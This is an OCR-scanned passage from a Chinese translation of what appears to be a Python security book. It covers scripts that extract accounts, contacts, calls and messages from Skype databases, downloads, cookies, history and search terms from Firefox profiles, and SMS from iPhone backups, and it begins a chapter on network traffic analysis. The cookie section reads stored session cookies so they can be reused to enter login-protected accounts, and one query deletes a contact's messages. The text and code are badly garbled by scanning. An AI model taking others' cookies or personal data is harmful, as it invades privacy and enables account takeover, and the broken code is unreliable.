行 后 将 会 返回 一 个 二 维 数组 。 每 次 执行 返回 的 结果 中 都 含有 依次 摆 放 的 用 户 名 、Skype 昵称 、 
位 置 和 创建 时 间 这 四 个 列 。 我 们 把 结果 解释 出 来 ， 然 后 把 它们 漂亮 地 显示 在 屏幕 上 。 










pt 
Sy 


从 运行 这 个 printProfile.py 后 得 到 的 结果 可 以 看 到 ，Skype 的 main.db 数据 库 中 只 有 一 个 
用 户 账 户 。 为 了 保护 隐私 ， 我 们 把 真正 的 昵称 换 成 了 <accountname>。 
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让 我 们 更 进一步 分 析 Skype 的 数据 库 ， 检 查 其 中 存放 的 联系 人 地 址 。 注 意 ， 在 Contacts 
表 中 存放 了 数据 库 中 每 个 联系 人 的 显示 名 、Skype 用 户 名 、 位 置 、 手 机 号 甚至 是 生日 。 所 有 这 
些 个 人 识别 信息 在 调查 和 攻击 某 个 目标 时 是 非常 有 用 的 ， 所 以 ， 让 我 们 来 搞定 它 。 我 们 先 输 
出 SELECT 语句 返回 的 信息 。 注 意 ， 其 中 的 某 些 字段 〈 比 如 生日 ) 可 能 是 空白 的 (null) 。 为 
应 对 这 种 情况 ， 我 们 使 用 了 IF 条 件 语 句 ， 只 把 非 空 的 字段 打印 出 来 。 






到 目前 为 止 ， 我们 只 介绍 了 检查 单 张 表 中 某 几 列 数据 的 方法 。 如 果 要 把 分 别 存 放 在 两 张 
表 中 的 信息 一 起 输出 来 ， 该 怎么 办 呢 ? 在 这 种 情况 下 ， 我 们 要 用 能 唯一 标识 各 个 列 的 列 名 对 
数据 库 中 的 表 进 行 连接 (join) 操作 。 举 例 来 说 ， 我 们 来 学 习 如 何 输出 存放 在 Skype 数据 库 中 
的 通话 记录 。 要 输出 详细 的 通话 记录 ， 需 要 使 用 两 张 表 一 一 Calls 和 Conversations. Calls 表 中 
存放 了 每 次 通话 的 时 间 惟 (timestamp) 和 一 个 名 为 conv_dbid 的 列 ， 其 中 存放 了 每 次 通话 的 
唯一 索引 号 。Conversations 表 中 存放 了 通话 对 象 的 标识 符 和 每 次 通话 的 唯一 索引 号 一 一 这 次 
它 被 放 在 一 个 名 为 id 的 列 中 。 因 此 ， 我 们 需要 使 用 一 个 带 条 件 的 “WHERE calls.conv_dbid = 
conversations.id” 的 SELECT 语句 对 两 张 表 进行 连接 操作 。 该 语句 执行 之 后 ， 返 回 的 结果 中 含 
有 曾经 发 起 过 的 ， 并 被 存放 在 目标 Skype 数据 库 中 所 有 通话 的 通话 时 间 和 通话 对 象 。 


TT ess leat re E ate Cs he ama al i | an i E eect Il 
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让 我 们 给 Skype 数据 库 解 析 脚 本 再 加 上 最 后 一 个 函数 ，Skype 的 数据 库 对 取证 来 说 是 一 个 
宝 矿 ， 它 会 把 所 有 发 送 和 收 到 的 消息 都 保存 在 数据 库 中 。 数 据 库 把 这 些 信息 存放 在 一 张 名 为 
“Messages ”的 表 中 。 我 们 从 这 张 表 中 用 SELECT 语句 选 出 timestamp, dialog partner, author 
和 body xml (其 中 存放 了 消息 的 原始 文本 ) 。 注 意 : 如 果 dialog partner 和 author 字段 是 不 一 
样 的 ， 那 么 就 是 数据 库 的 所 有 者 发 送 这 条 消息 给 dialog_partner 的 。 反 之 ， 如 果 dialog_partner 
和 author 字段 是 一 样 的 ， 就 是 dialog_partner 发 送 的 这 条 消息 ， 这 时 需要 在 消息 前 加 一 个 
“from”。 


把 所 有 这 些 都 放 在 一 起 ， 我 们 就 有 了 一 个 检查 Skype 数据 库 的 功能 相当 强大 的 脚本 。 这 
些 脚本 会 把 账户 信息 、 联 系 人 地 址 、 通 话 记录 以 及 存放 在 数据 库 中 的 消息 都 打印 出 来 。 我 们 
还 要 在 main 函数 中 加 上 一 些 参数 解析 代码 ， 并 使 用 OS 模块 中 提供 的 几 个 函数 ， 在 执行 各 个 
数据 库 分 析 函 数 之 前 ， 确 认 数据 库 文件 确实 存在 。 
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运行 这 个 脚本 ， 我 们 用 -p 参数 指定 Skype 数据 库 所 在 的 路 径 。 脚 本 将 输出 目标 中 存储 的 
账户 信息 、 联 系 人 地 址 、 通 话 记 录 和 消息 。 成 功 ! 下 面 将 运用 已 经 掌握 的 关于 SQLite3 的 知 
识 检 查 另 一 款 主流 软件 一 一 火狐 Firefox) 浏览 器 中 存储 的 上 网 历史 记录 。 
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更 多 信息 





其 他 有 用 的 一 些 Skype 查询 语句 


如 果 有 兴趣 ， 可 以 再 多 花 点 时 间 更 深入 地 分 析 Skype 数据 库 ， 并 编写 一 些 新 的 脚本 。 考 虑 下 
面 这 些 查 询 语句 可 能 也 是 很 有 用 的 : 

如 果 只 想 打 印 出 联系 人 列表 中 其 生日 不 为 空 的 联系 人 ? 

SELECT fullname, birthday FROM contacts WHERE birthday > 0; 

如 果 只 想 输 出 “Conversation” 表 中 只 与 某 个 特定 的 <SSKYPE-PARTNER> 相 关 的 通话 记录 ? 

SELECT datetime(timestamp, ‘unixepoch'), dialog partner, author, body xml FROM Messages 
WHERE dialog partner = '<SK YPE-PARTNER>' 

如 果 要 删除 “Conversation” 表 中 只 与 某 个 特定 的 <SKYPE-PARTNER> 相 关 的 通话 记录 ? 

DELETE FROM messages WHERE skypename = '<SK YPE-PARTNER>"' 
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用 Python 解析 火狐 浏览 器 的 SQLite3 数 据 库 


在 上 一 节 中 ， 我 们 分 析 了 一 个 由 Skype 应 用 程序 集中 存储 数据 的 单个 数据 库 。 数 据 库 提 
供 了 大 量 对 取证 调查 非常 有 用 的 数据 。 下 面 来 检查 火狐 浏览 器 分 散 地 存储 在 多 个 数据 库 中 的 
数据 。 在 Windows 操作 系统 中 ， 火 狐 把 这 些 数 据 库存 放 在 “CNDocuments and 
Settings\<USER>\Application Data\Mozilla\ Firefox\Profiles\<profile folder>\” 目 录 中 ,在 Mac 
OS X 操作 系统 中 ， 火 狐 把 这 些 数 据 库 存放 在 “ /Users/<USER>/Library/Application 
Support/Firefox/Profiles/<profile folder>” 目 录 中 。 下 面 列 出 这 个 目录 中 存放 的 所 有 SQLite 数 
据 库 。 






看 一 下 目录 中 的 内 容 ， 火 狐 显 然 存 储 了 大 量 对 取证 极 具 价 值 的 数据 。 但 是 从 哪里 入 手 开 
始 调查 呢 ? 我 们 先 来 看 downloads.sqlite 数据 库 。 文 件 downloads.sglite 中 存储 的 是 火狐 用 户 下 
载 文 件 的 相关 信息 。 其 中 只 有 一 张 名 为 moz_downloads 的 表 记 录 了 文件 名 、 源 下 载 地 址 、 下 
载 时 间 、 文 件 大 小 、 引 用 (referrer) 和 本 地 存放 该 文件 的 路 径 。 我 们 用 一 个 Python 脚本 执行 
一 个 SQLite 的 SELECT 语句 ， 提 取 相应 列 (name, source 和 datetime) 中 的 信息 。 请 注意 ， 
火狐 对 我 们 之 前 讨论 过 的 UNIX 时 间 格 式 做 了 一 些 有 意思 的 修改 : 它 是 当前 时 间距 1970 年 1 
月 1 日 过 了 多 少 秒 ， 再 乘 以 1000000。 所 以 在 转换 时 间 之 前 ， 先 要 把 它 除 以 100 万 。 
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对 downloads.sqlite 运行 这 个 脚本 ， 我 们 看 到 运行 结果 中 有 一 个 之 前 下 载 的 文件 的 相关 信 
。 事 实 上， 这 个 文件 就 是 在 之 前 章节 中 学 习 元 数据 时 下 载 的 。 


il 


investigator$ python firefoxDownloads.py 

[*] --- Files Downloaded --- 

[+] File: ANONOPS The Press Release. pdf from source: 
ii //www.wired.com/images _blogs/threatlevel/2010/12/ANONOPS_ The 
Press Release.pdf at: 2011-12-14 05:54:31 "E 


太 棒 了 ! 现在 我 们 知道 火狐 在 什么 时 候 下 载 指 定 的 文件 。 可 是 ， 如 果 调 查 人 员 想 再 次 登 
录 那 些 需要 认证 的 站 点 ， 该 怎么 办 呢 ? 例如 ， 和 刑侦 总 队 的 侦查 员 该 如 何 认 定 某 个 用 户 是 通过 
一 个 基于 Web 的 电子 邮件 网 站 下 载 色 情 图 片 的 ? 侦查 员 可 能 想 要 再 次 登录 这 个 基于 Web 的 电 
子 邮 件 网 站 《当然 是 合法 的 ) ， 但 在 很 多 情况 下 ， 他 并 没有 登录 该 用 户 的 电子 邮件 网 站 的 口 
令 或 凭证 ， 这 时 就 需要 cookie。 因 为 HTTP 是 一 个 无 状态 的 协议 ，Web 站 点 要 使 用 cookie 来 

考虑 下 面 这 一 情形 ;假如 用 户 登录 了 基于 Web 的 电子 邮件 网 站 ， 如 果 他 的 浏览 器 不 支持 
cookie， 那 么 他 就 不 得 不 每 打开 一 封 邮件 就 登录 一 次 。 火 狐 把 所 有 这 些 cookie 都 存放 在 一 个 
名 为 cookies.sqlite 的 数据 库 中 。 如 果 调 查 人 员 能 提取 到 这 些 cookie 并 重用 它们 ， 就 有 可 能 访 
问 到 原本 需要 登录 后 才能 访问 到 的 资源 。 


Wit “SHARC MB” tix 


升级 SQLite3 
你 可 能 已 经 注意 到 : 如 果 试 图 使 用 Backtrack 5 RR 默认 安装 的 SQLite3 打开 
“cookies.sqlite” 数 据 库 ， 则 提示 : “file is encrypted or is not a database” (文件 已 加 密 
或 不 是 数据 库 文件 ) 错误 。 这 是 因为 默认 安装 的 SQLite3 的 版 本 是 SQLite3.6.22, CA 
支持 WAL joumal 模式 。 而 最 新 版 的 火狐 浏览 器 在 使 用 “cookies.sqlite ”和 


“places.sqlite” 数 据 库 的 代码 中 有 这 样 一 行 代 码 “PRAGMA journal mode=WAL”。 在 
试图 用 旧版 本 的 SQlite3 或 旧版 本 的 Python SQLite3 库 打 开 这 些 数据 库 时 ， 就 会 产生 一 
个 错误 。 


SQLite version 3.6.22 
Enter ".help" for instructions 
Enter SOL statements terminated with a ";" 


sqlite> select * from moz cookies; 
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Error: file is encrypted or is not a database 


在 升级 了 你 的 SQLite} 二 进 制 可 执行 文件 或 SQLite3 库 到 大 于 3.7 版 本 之 后 ， 你 就 
能 打开 新 版 的 火狐 浏览 器 的 数据 库 了 。 


investigator:!# sqlite3.7 !/.mozilla/firefox/ng474mcm.default/ 
cookies.sqlite 


SQLite version 3.7.13 2012-06-11 02:05:22 


Enter ".help" for instructions 


Enter SQL statements terminated with a ";" 
sqlite> select * from moz cookies; 
1|backtrack-linux.org|  <..SNIPPED..> 


4|sourceforge.net|sf mirror _attempt|<..SNIPPED..> 


为 了 防止 我 们 的 脚本 在 打开 “cookies.sqlite” 和 “places.sqlite” 数 据 库 时 ， 因 为 这 
种 未 处 理 的 错误 而 崩溃 ， 我 们 在 脚本 中 添加 了 处 理 这 类 “数据 库 已 加 密 ” 的 出 错 消息 
的 异常 处 理 代 码 。 为 了 避免 受到 这 类 错误 ， 请 升级 你 的 Python-Sqlite3 库 ， 或 者 只 使 用 
本 书 配套 网 站 上 提供 的 旧版 本 的 火狐 “cookies.sqlite” 和 “places.sqlite” 数 据 库 。 





我 们 来 写 一 个 快速 的 Python 脚本 ， 在 调查 过 程 中 提取 用 户 的 cookie。 首 先 连接 数据 库 ， 
执行 SELECT 语句 。 在 数据 库 的 “moz cookies” 表 中 保存 的 是 cookie 相关 的 数据 。 从 
“cookies.sqlite” 数 据 库 中 的 “moz_cookies” 表 里 可 以 查询 到 host. name 和 cookie 列 中 的 数 
据 ， 并 把 它们 打印 到 屏幕 上 。 


def i aana o a aA 
try: 
conn = sqlite3.connect (cookiesDB) 
¢ = conn.cursor() | 
ra execute (' SELECT host, name, yr FROM moz _cookies' a J 
print '\n[*] -- Found Cookies” --!' | 
Lor row anes. i | | 
host = str(row[0]) 
‘name = str(row[1]). 
value = str(row[2]) 
Print Et Host:: 9 + hest tot Cookies.’ +- name Ney!) 
+ ', Value: ' + value | iit 
except Exception, e: 
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if ‘encrypted' in str(e): 
prine Okai] Error reading your cookies a 
Nr hry] Upgrade your Python-Sqlite3 Library' 


调查 人 员 可 能 还 想 列 出 浏览 器 的 上 网 历史 记录 。 火 狐 浏 览 器 把 这 些 数据 保存 在 一 个 名 为 
places.sglite 的 数据 库 中 。 其 中 的 “moz places” 表 可 以 给 出 关于 用 户 在 何 时 〈 时 间 ) 访问 了 
何 处 〈 地 址 ) 的 网 站 信息 。 尽 管 脚本 中 的 printHistory0 函 数 只 使 用 了 “moz places” 表 中 的 数 
据 ， 但 ForensicWiki 网 站 上 建议 我 们 联合 使 用 “moz places” 和 “moz historyvisits” 表 中 的 数 
据 ， 以 获取 一 张 真正 的 浏览 器 上 网 历史 记录 !' (Forensics Wiki, 2011) 。 


def printHistory (placesDB): 
CENI 
conn = sqlite3.connect (placesDB) 
c = conn.cursor() . 
c.execute ("select url, datetime (visit date/1000000, \ 
‘unixepoch') from moz places, moz_historyvisits \ 
‘where visit count > 0 and moz_places.id==\ 
|. moz_historyvisits.place_ Me | 
_ print "\n(*] == Found History -- 
for row in’ c: = 
url = str(row[0]) 
date = str(row[1)) 
print VA + Gases + © Visltede- 小 “El 
except. Exception, e: - 
ee if 'encrypted" in ‘str (e): 
OOO print '\n[*] Error reading your places database." 
print '[*] Upgrade your Python-Sgqlite3 Library' 
exit (0) 


让 我 们 用 上 面 这 个 例子 和 学 过 的 关于 正则 表达 式 的 知识 来 扩展 上 面 这 个 函数 的 功能 。 因 
为 上 网 历史 记录 是 极端 重要 的 ， 如 果 能 进一步 分 析 某 些 特定 的 URL 的 访问 记录 也 可 能 是 非常 
有 用 的 。 例 如 ， 用 谷歌 进行 搜索 时 ， 搜 索 的 关键 字 就 会 被 放 在 URL 里 。 在 第 5 章 的 “编写 谷 
歌 键盘 记录 器 ”一 节 中 将 更 深入 地 讨论 这 一 点 。 但 现在 只 要 提取 出 被 放 在 URL 里 的 搜索 关键 
字 就 可 以 。 如 果 在 历史 记录 中 找 出 一 个 含有 “google” 的 URL， 我 们 可 以 搜索 其 中 以 “gq=” 
开头 、 以 “&&” 结 尾 的 字符 串 ， 这 个 字符 串 就 是 谷歌 搜索 的 关键 字 。 如 果 找 到 了 这 个 字符 串 ， 
就 需要 整理 输出 的 字符 串 ， 把 URL 里 可 能 存在 的 用 作 关 键 字 分 隔 符 的 加 号 替换 成 我 们 习惯 的 


1 原文 如 此 ， 但 从 作者 下 面 给 出 的 代码 看 ， 这 个 printHistory0 是 按照 ForensicWiki 网 站 上 的 建议 编写 
的 。 一 一 译 者 注 
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空格 。 最 后 把 正确 的 结果 输出 到 屏幕 上 。 现 在 我 们 就 有 了 一 个 能 搜索 “places.sqlite” 文 件 ， 
找到 并 打印 出 谷歌 搜索 记录 的 函数 。 






把 所 有 这 些 都 放 在 一 起 ， 现 在 我 们 就 能 打印 下 载 过 的 文件 、cookie、 上 网 历史 记录 甚至 是 
谷歌 搜索 记录 。 脚 本 中 的 参数 解析 代码 与 上 一 节 解 析 Skype 数据 库 脚 本 中 的 参数 解析 代码 非 
BRU. 

你 可 能 已 经 注意 到 : 在 创建 文件 的 完整 路 径 时 ， 我 们 使 用 的 是 os.pathjoin 方法 。 为 什么 
不 在 目录 路 径 后 面 加 上 反 斜 枉 后 ， 再 加 上 文件 名 以 获得 文件 的 完整 路 径 呢 ? 是 什么 不 让 我 们 
用 下 面 的 代码 : 


downloadDB = pathName + "\\downloads.sqlite" 
只 能 用 
downloadDB = os.path.join(pathName, "downloads.sqlite") 


这 样 的 代码 呢 ? 

考虑 这 样 的 情况 : 在 Windows 系统 中 使 用 这 样 的 文件 路 径 : “CNUsers\ 
<user_name>\” , MÆ Linux 和 Mac OS 中 使 用 的 是 这 样 的 文件 路 径 : “ /home/<user_ 
name>/”。 在 不 同 的 操作 系统 中 ， 表 示 目 录 的 分 隔 符 一 一 斜 杠 是 完全 相反 的 。 我 们 将 不 得 不 
在 生成 文件 的 完整 路 径 时 选用 正确 的 斜 本 。OS 库 允 许 创建 一 个 与 操作 系统 无 关 的 脚本 ， 它 无 
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论 是 在 Windows、Linux 还 是 Mac OS 系统 中 都 能 正常 工作 。 | 

搞定 这 个 烦人 的 斜 杠 符 之 后 ， 我 们 就 有 了 一 个 完整 的 能 对 火狐 浏览 器 中 记录 的 数据 进行 
严肃 的 取证 分 析 的 脚本 。 在 实践 过 程 中 ， 请 根据 你 调查 的 具体 需求 ， 修 改 这 个 脚本 或 为 其 加 
入 新 的 功能 。 


cube 
se Wiest 


Me 
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某 个 涉案 火狐 数据 库 运 行 这 个 脚本 ， 会 得 到 如 下 结果 。 在 下 一 节 中 ， 我 们 将 运用 这 两 
节 中 学 到 的 技巧 ， 并 扩充 关于 SQLite 的 知识 ， 在 存 有 海量 数据 的 数据 库 中 精确 地 找 出 所 需 的 
信息 。 
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用 Python 调查 iTunes 的 手机 备份 


2011 年 4 月 ， 安 全 研究 员 和 前 苹果 雇员 Pete Warden 披露 了 热 销 的 苹果 iPhone/iPad 上 
iOS 操作 系统 中 的 一 个 隐私 问题 (Warden，2011) 。 在 进行 一 番 严 肃 的 调查 之 后 ，Warden 5 
生 证 明 : 苹果 的 iOS 操作 系统 实际 上 会 跟踪 和 记录 设备 的 GPS 经 纬度 信息 ， 并 把 它们 存储 在 
手机 里 一 个 名 为 consolidated.db 的 数据 库 中 (Warden, 2011) 。 在 这 个 数据 库 中 ， 有 一 张 名 为 
“Cell-Location ”的 表 ， 其 中 含有 手机 已 经 收集 到 的 GPS 定位 点 。 手 机 会 用 对 最 近 的 基站 进行 
三 角 定 位 的 方式 ， 获 知 自己 的 位 置信 息 ， 以 便 为 使 用 者 提供 最 好 的 服务 。 当 然 ， 正 如 Warden 
先生 预测 的 那样 ， 这 些 信 息 还 可 以 被 用 来 恶意 地 跟踪 iPhone/iPad 使 用 者 的 活动 轨迹 。 更 进 一 
步 说 ， 在 备份 移动 设备 时 ， 记 录 到 计算 机 的 移动 设备 的 副本 中 也 含有 这 一 信息 。 尽 管 苹果 公 
司 的 iOS 操作 系统 设计 的 功能 会 删除 这 些 地 理 位 置信 息 ， 但 是 Warden 先生 的 调查 发 现 这些 数 
据 仍然 存在 。 在 这 一 节 中 ， 我 们 将 重 现 这 一 过 程 一 一 从 iOS 移动 设备 的 备份 中 提取 出 这 些 信 
息 。 特 别 是 ， 我 们 将 用 一 个 Python 脚本 提取 出 iOS 备份 中 的 所 有 短信 记录 。 

当 用 户 对 iPhone/iPad 设备 进行 备份 时 ， 它 会 把 相关 文件 存放 到 他 /她 的 计算 机 中 一 个 特定 
的 目录 中 。 在 Windows 操作 系统 中 ，iTunes 应 用 程序 会 把 数据 存放 在 用 户 目 录 下 的 移动 设备 
备份 目录 中 (C:\Documents and Settings\<USERNAME>\Application Data\AppleComputer\ 
MobileSync\Backup) ， 而 在 Mac OS X 中 ， 这 个 目录 则 是 “/Users/<USERNAME>/Library/ 
Application Support/MobileSync/ Backup/”。 对 移动 设备 进行 备份 的 iTunes 程序 会 把 所 有 的 设 
备 备份 文件 都 存放 在 这 个 目录 中 。 

我 们 来 看 一 下 这 个 存放 备份 的 目录 中 的 内 容 ， 其 中 有 超过 1000 个 文件 名 像 乱码 一 样 的 文 
件 ， 每 个 文件 的 文件 名 都 由 40 个 字符 组 成 ， 互 不 重复 ， 其 中 根本 就 没有 透露 任何 文件 中 到 底 
存放 的 是 什么 信息 。 

investigator$ ls 

68b16471ed678a3a470949963678d47b7a415be3 

68c96ac7d7f02c20e30ba2acc8d91c42f7d2f77f 

68b16471ed678a3a470949963678d47b7a415be3 
68d321993fe03f7fe6754f5f4balS5a9893fe38db 
69005cb27b4af77b149382d1669ee34b30780c99 
693a31889800047f02c64b0a744e68d2a2cff267 
6957b494a71f191934601d08ea579b889f417af9 
698b7961028238a63d02592940088f232d23267e 


6a2330120539895328d6e84d5575cf44a082c62d 
<..SNIPPED. = 


itl 
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为 了 更 多 地 获取 关于 这 些 文件 的 信息 ， 我 们 用 UNIX 命令 file 来 分 析 各 个 文件 的 文件 类 
型 。 这 条 命令 利用 存放 在 文件 头 部 和 尾部 的 特征 字符 来 判断 文件 的 类 型 。 这 给 我 们 提供 了 稍 
微 多 一 点 的 信息 ， 就 像 我 们 看 到 的 那样 ， 移 动 设 备 备 份 目录 中 有 一 些 SQLite3 数据 库 文件 、 
JPEG 图 片 文 件 、 纯 二 进 制 文 件 和 ASCII 文本 文件 。 


1 fi 7 = 
| Hi MI Tipe s AN ill ia ji ji y ws Y kile rr, al! Ñ TUAR 
; : i Au k | T LP a Yul ey { ; 
ir 中 ME i 
at $ 






Y a " 
Ail 3 A Ide n 
x rao oe :人 ir ' 
we . inf bait $f 


尽管 file 命令 确实 告诉 我 们 其 中 有 一 些 是 SQLite 数据 库 文件 ， 但 它 还 是 没 告诉 我 们 每 个 
数据 库 中 都 存放 了 什么 数据 。 我 们 将 用 一 个 Python 脚本 快速 列举 出 在 整个 移动 设备 备份 目录 
中 每 一 个 数据 库 中 所 有 表 的 表 名 。 注 意 ， 我 们 又 一 次 在 脚本 中 导入 了 SQLite3 库 ， 脚 本 会 列 
出 当前 工作 目录 中 的 所 有 文件 ， 并 把 每 个 文件 都 作为 SQlite 数据 库 文 件 ， 然 后 尝试 进行 连 
接 。 如 果 成 功 地 建立 了 连接 ， 它 就 会 执行 下 面 这 条 SQL 语句 : 


SELECT tbl_name FROM sqlite_master WHERE type=='table' 


每 个 SQLite 数据 库 中 都 会 维护 一 张 名 为 “sqlite_master” 的 表 ， 其 中 含有 整个 数据 库 
结构 的 信息 ， 记 录 了 整个 数据 库 中 各 张 表 的 结构 。 上 面 这 条 命令 可 以 列 出 数据 库 中 所 有 表 
的 名 称 。 





TE lt Lan 4 E For A Ue mse SEFTON ASRS kod 
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运行 这 个 脚本 后 ， 列 出 了 移动 设备 备份 目录 下 所 有 数据 库 中 各 张 表 的 名 称 。 尽 管 我 们 的 
脚本 确实 找 出 了 好 几 个 数据 库 ， 但 我 们 还 是 对 输出 结果 进行 了 剪辑 ， 只 显示 了 我 们 所 关心 的 
一 个 特定 的 数据 库 。 注 意 到 文件 d0d7e5fb2ce288813306e4d4636395e047a3d28 中 的 这 个 数据 库 
中 有 一 张 名 为 messages 的 表 ， 这 个 数据 库 中 含有 存储 在 iPhone 备份 中 的 短 消 息 (text 
messages) 的 列表 。 






虽然 我 们 已 经 知道 了 文件 d0d7e5fb2ce288813306e4d4636395e047a3d28 就 是 存放 短 消 息 的 
数据 库 ， 但 是 我 们 还 是 想 在 每 次 调查 不 同 的 备份 时 ， 都 能 自动 找 出 这 个 数据 库 。 为 了 达成 这 
一 目标 ， 我 们 来 编写 一 个 简短 的 函数 一 一 isMessageTable()， 该 函数 将 尝试 连接 指定 的 数据 
库 ， 并 列 出 数据 库 中 的 所 有 表 名 。 如 果 其 中 含有 一 个 名 为 “messages” 的 表 ， 它 就 返回 true, 
否则 ， 函 数 就 返回 false。 现 在 我 们 就 能 快速 扫描 目录 中 成 千 上 万 个 文件 ， 并 确定 其 中 的 哪个 
文件 是 含有 短 消息 的 SQLite 数据 库 。 
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> = 
| y 
p ALS 5 





现在 我 们 已 经 能 找到 文本 消息 数据 库 了 ， 但 我 们 还 想 把 数据 库 中 的 数据 一 特别 是 发 送 
时 间 、 对 方 手机 号 码 以 及 短 消息 本 身 一 一 打印 出 来 。 为 了 做 到 这 一 点 ， 我 们 需要 连接 数据 

‘select datetime(date, \'unixepoch\'), address, text from message WHERE address>0;' 

然后 把 查询 的 结果 打印 到 屏幕 上 。 注 意 ， 我 们 还 要 使 用 一 些 异常 处 理 代码 ， 以 防止 出 现 
isMessageTable() 返 回 一 个 没有 三 个 必要 列 (data, address. text) 的 不 含有 文本 消息 的 数据 库 
的 情况 发 生 。 如 果 我 们 由 于 某 种 错误 得 到 了 错误 的 数据 库 ， 则 会 让 脚本 抛 出 一 个 异常 ， 并 继 
续 运 行 下 去 ， 直 到 找到 正确 的 数据 库 为 止 。 


’ vi 人 一 < | I J J3- pIeT T MENA 
i + i oe i a 六 Şi P a mes 4 ` 
ft by WS Pie A y + 
an 1 l 
ji bye test | I} À 7 











把 isMessageTable()#ll printMessage() 函 数 放 在 一 起 就 有 了 最 终 的 脚本 。 我 们 还 会 在 脚本 中 
加 入 一 些 参数 解析 代码 ， 让 我 们 可 以 在 参数 中 指定 iPhone 备份 目录 的 所 在 路 径 。 接 下 来 将 列 
出 该 目录 下 的 所 有 文件 ， 并 逐个 测试 每 个 文件 ， 直 到 找到 短 消 息 数据 库 为 止 。 一 县 找到 这 个 
文件 ， 我 们 就 会 把 数据 库 里 存放 的 内 容 打 印 到 屏幕 上 。 
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对 iPhone 备份 目录 运行 这 个 脚本 后 ， 可 以 看 到 存储 在 iPhone 备份 中 最 近 收 发 的 一 些 短 消 息 。 


T- FA a 
An Tr TOS -i 
) +» 


本 章 小 结 


再 次 恭喜 你 ! 本 章 中 我 们 编写 了 一 些 调查 数字 历史 记录 的 工具 。 其 中 ， 有 些 是 分 析 
Windows 注册 表 和 回收 站 的 ， 有 些 是 解析 遗留 在 元 数据 中 的 或 应 用 程序 存放 在 数据 库 中 的 历 
史记 录 的 。 我 们 已 经 往 你 的 “军火 库 ” 中 添加 了 一 些 很 有 用 的 工具 。 和 希望 你 能 改进 本 章 中 各 
个 示例 的 代码 ， 搞 定 你 在 今后 的 调查 过 程 中 遇 到 的 问题 。 
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S45 ”用 Python 分 析 网 络 流量 


本 章 简介 : 

。 定位 IP 流量 的 地 理 位 置 

© 发 现 恶 意 分 布 式 拒绝 服务 (DDoS) THE 

© 发 现 伪装 网 络 扫 描 

。 分 析 风 暴 (Storm) 僵尸 网 络 中 使 用 的 Fast-Flux 和 Conficker 蠕虫 中 使 用 的 Domain 
Flux 

。 理解 TCP 序列 号 预测 攻击 

。 ERAR ORFA RRRA ODS) 


武术 不 仅仅 是 一 种 技术 ， 它 还 应 该 是 我 们 生活 的 方式 、 哲 学 、 育 儿 之 道 、 
精心 投入 的 工作 、 经 营 的 关系 以 及 我 们 每 天 做 出 的 选择 的 延伸 。 
一 一 丹 尼 埃 尔 . 伯 莱 里 ， 作 家 ，San Soo 功夫 四 级 黑 带 


引言 “极光 ”行动 以 及 为 什么 明显 的 迹象 会 被 忽视 


2010 £1 H 14H, 美国 政府 获悉 一 起 多 路 协同 、 老 练 且 持 久 的 网 络 攻击 ， 攻 击 目 标 为 谷 
ak. Adobe 及 其 他 30 多 家 世界 财富 100 强 企 业 (Binde, McRee, &O’Connor, 2011) 。 在 这 次 
被 称 为 “极光 ”行动 (该 名 称 源 自 一 台 被 黑 计 算 机 上 发 现 的 文件 夹 名 字 ) 的 攻击 中 ， 使 用 了 
一 个 之 前 从 未 被 使 用 过 的 新 型 漏洞 利用 代码 ， 尽 管 微软 先前 已 经 知道 这 个 系统 漏洞 ， 但 他 们 
错误 地 认为 没有 其 他 人 知道 它 ， 因 此 也 就 没有 检测 类 似 攻 击 的 机 制 。 

在 实施 攻击 的 过 程 中 ， 攻 击 者 首先 会 向 被 攻击 者 发 送 一 封 带 有 指向 台湾 某 个 含有 恶意 
JavaScript 代码 的 网 站 链接 的 电子 邮件 (Binde, McRee, & O’Connor, 2011) 。 当 用 户 单 击 这 个 
链接 时 ， 就 会 下 载 一 个 回 连 到 一 台 位 于 中 国 大 陆 的 命令 一 控制 服务 器 的 恶意 软件 (Zetter， 
2010) 。 之 后 ， 攻 击 者 就 能 利用 新 获得 的 访问 权限 寻找 存储 在 被 黑 的 系统 中 他 们 所 关心 的 信息 。 
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就 像 这 次 攻击 中 表现 出 来 的 那样 ， 很 明显 ， 在 长 达 数 月 的 时 间 里 ， 它 没有 被 检测 出 来 ， 
而 是 成 功 地 渗透 进 了 许多 家 世界 100 强 企业 的 源码 仓库 ， 甚 至 一 个 基本 的 网 络 可 视 化 软件 都 
能 识别 出 这 一 行为 。 为 什么 一 家 位 于 美国 的 世界 100 强 公司 会 有 这 么 多 员工 连接 上 中 国 台 湾 
的 某 个 特定 的 网 站 之 后 ， 紧 接着 又 去 连接 位 于 中 国 大 陆 的 某 个 特定 的 服务 器 呢 ? 一 幅 能 够 展 
示 出 员工 以 极 高 的 频率 同时 连接 中 国 台湾 和 中 国 大 陆 可 视 化 的 地 图 ， 足 以 让 网 络 管理 员 随 即 
展开 攻击 调查 ， 并 在 相关 的 信息 泄露 之 前 切断 它 。 

在 下 和 面 的 内 容 中 ， 我 们 将 运用 Python 分 析 多 种 不 同类 型 的 攻击 行为 ， 以 便 快 速 解析 出 使 
用 了 大 量 不 同 数据 节点 的 攻击 。 我 们 先 来 编写 一 个 可 视 化 地 分 析 网 络 流 量 的 脚本 来 开始 我 们 
的 调查 之 旅 ， 该 方法 可 以 被 那些 财富 100 强 受 害 企 业 的 行政 管理 员 在 “极光 ”行动 中 使 用 。 


IP 流 量 将 何去何从 ? 一 一 用 Python 回 答 


在 开始 之 前 ， 我 们 先 要 学 会 怎么 把 一 个 网 际 协 议 地 址 (IP 地址) 和 它 所 在 的 物理 地 址 关 
联 起 来 。 要 做 到 这 一 点 ， 可 使 用 MaxMind 公司 提供 的 一 个 可 以 免费 获取 的 数据 库 。 尽 管 
MaxMind 公司 还 卖 一 些 更 准确 的 商业 产品 ， 但 它 的 开源 数据 库 GeoLiteCity 还 是 能 让 我 们 足够 
准确 地 把 IP 地 址 与 其 所 在 的 城市 一 一 对 应 起 来 ， 它 的 下 载 地 址 是 : http:/www.maxmind. 
com/app/geolitecity。 把 它 下 载 下 来 之 后 ， 解 压 至 类 似 /opt/GeoIP/Geo.dat 的 位 置 处 即 可 。 


analyst# wget http://geolite.maxmind.com/download/geoip/database/ 
GeoLiteCity. dat. GZ | 
| 2 g0t2-03+1°71' 0802s 20-- http: .//geolite. ‘maxmind. com/download/geoip/ 
database/GeoLiteCity.dat.gz 
Resolving geolite.maxmind. com... 174.36.207.186 ae 
Connecting to geolite.maxmind. ‘com|174.36. 207.186) :80... connected. 
HTTP request sent, awaiting response.. 200 OK 
Length: 9866567 (9.4M) [text/plain] 
Saving to: 'GeoLiteCity. dat.gz' | 
